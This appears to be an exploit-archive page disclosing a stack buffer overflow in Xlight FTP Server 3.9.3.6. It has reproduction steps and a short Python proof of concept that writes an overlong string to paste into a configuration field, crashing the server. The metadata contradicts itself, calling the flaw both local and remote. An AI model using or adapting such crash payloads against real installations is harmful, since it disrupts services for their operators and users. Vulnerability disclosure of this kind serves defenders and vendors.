Xlight FTP Server 3.9.3.6 Stack Buffer Overflow

2023.08.05

Credit: Yehia Elghaly

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-119

# Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
# Discovered by: Yehia Elghaly
# Discovered Date: 2023-08-04
# Vendor Homepage: https://www.xlightftpd.com/
# Software Link : https://www.xlightftpd.com/download/setup.exe
# Tested Version: 3.9.3.6
# Vulnerability Type: Buffer Overflow Local
# Tested on OS: Windows XP Professional SP3 - Windows 11 x64
# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)
# Steps to reproduce:
# 1. - Download and Xlight FTP Server
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open Xlight FTP Server 3.9.3.6
# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup
# 6. - Execute a Program after use logged in- Paste the characters
# 7 - Crashed
#!/usr/bin/env python3
exploit = 'A' * 294
try:
with open("exploit.txt","w") as file:
file.write(exploit)
print("POC is created")
except:
print("POC not created")

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Xlight FTP Server 3.9.3.6 Stack Buffer Overflow

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.